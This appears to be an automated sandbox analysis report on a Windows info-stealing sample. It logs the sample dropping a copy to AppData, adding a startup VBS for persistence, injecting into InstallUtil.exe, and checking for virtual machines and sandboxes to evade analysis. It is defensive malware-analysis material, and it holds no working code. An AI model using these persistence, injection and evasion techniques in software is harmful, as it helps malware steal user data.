                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#1550238.exe, 00000000.00000002.2527052061.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2847393725.0000000003774000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#1550238.exe, 00000000.00000002.2523426646.0000000003921000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.2528520162.0000000006B20000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#1550238.exe.38d1b68.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#1550238.exe.3921b88.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.Ref#1550238.exe.63d0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.6ab0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3843d28.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2528281598.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2523426646.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4A22 push eax; retf 0_2_063C4A23
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4ADD pushfd ; iretd 0_2_063C4ADE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4B0F push eax; retf 0_2_063C4B10
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C33B1 pushfd ; iretd 0_2_063C33B2
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C4BAA push edx; retf 0_2_063C4BAB
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C8046 push es; retf 0_2_063C8060
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_063C50B2 push eax; retf 0_2_063C50B3
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A24030 push es; ret 0_2_06A240E0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A3C6A7 push edi; ret 0_2_06A3C6BE
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A33EAF push es; ret 0_2_06A33F24
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A33E61 push es; ret 0_2_06A33F24
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06A30FED push es; iretd 0_2_06A30FF4
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8F39F pushfd ; iretd 0_2_06B8F3A0
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B82410 push es; ret 0_2_06B82420
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8C816 push es; ret 0_2_06B8C82C
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06B8F564 pushfd ; iretd 0_2_06B8F565
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06C43234 pushfd ; iretd 0_2_06C4323A
                      Source: C:\Users\user\Desktop\Ref#1550238.exeCode function: 0_2_06EA6508 push eax; iretd 0_2_06EA650D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_03290C6D push edi; retf 3_2_03290C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_06CEFAF0 push es; ret 3_2_06CEFAF4
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B904A0 pushfd ; iretd 5_2_05B904A2
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B96788 push es; iretd 5_2_05B96796
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9FF30 push ds; iretd 5_2_05B9FF3E
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B94F21 push eax; retf 5_2_05B94F22
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B96741 push es; iretd 5_2_05B9674E
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9D69E push ebx; iretd 5_2_05B9D6BE
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9FEEA push ds; iretd 5_2_05B9FEF6
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B94EC2 pushfd ; iretd 5_2_05B94EC3
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9E647 pushad ; iretd 5_2_05B9E666
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B9D198 push esp; iretd 5_2_05B9D1A5
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_05B950B2 push eax; retf 5_2_05B950B3
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\vdvfyt.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#1550238.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: Ref#1550238.exe PID: 4920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 6740, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#1550238.exe, 00000000.00000002.2509223302.000000000274F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 2270000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 43E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4C10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeWindow / User API: threadDelayed 362Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 3848Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 5012Thread sleep count: 111 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 5012Thread sleep count: 362 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5040Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2088Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2088Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6336Thread sleep count: 273 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6336Thread sleep count: 35 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5248Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1240Thread sleep count: 199 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: vdvfyt.exe, 00000005.00000002.2832313875.000000000248F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000008.00000002.3377013006.0000000005E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Ref#1550238.exe, 00000000.00000002.2508714224.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.2743053297.00000000064E7000.00000004.00000020.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2830392254.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1169008Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: A07008Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Users\user\Desktop\Ref#1550238.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Users\user\AppData\Roaming\vdvfyt.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#1550238.exe.3a34098.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.vdvfyt.exe.38777e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
